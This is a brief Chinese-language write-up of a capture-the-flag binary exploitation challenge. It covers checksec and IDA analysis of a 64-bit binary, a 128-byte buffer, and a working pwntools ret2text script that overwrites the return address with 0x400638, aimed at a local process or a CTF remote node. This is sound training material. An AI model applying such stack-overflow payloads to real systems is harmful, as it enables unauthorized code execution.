信息收集
file查看文件为64位,同时checksec表明开启了NX保护,所以排除re2shellcode办法,再根据题目提示,锁定目标re2test
IDA
明确目标要替换返回到ctfshow函数
汇编模式下可查看其起始地址为38
而在main函数中,我们关注welcome函数
查看其变量s大小进行覆盖
根据上下s计算,其大小为0x80(转化十进制128)
构造payload
from pwn import *
ghust = process('./pwn')
# ghust = remote("node4.buuoj.cn",26246)
addr = 0x400638
payload = b'A' * 128 + b'B'*8 + p64(addr)
ghust.sendline(payload)
ghust.interactive()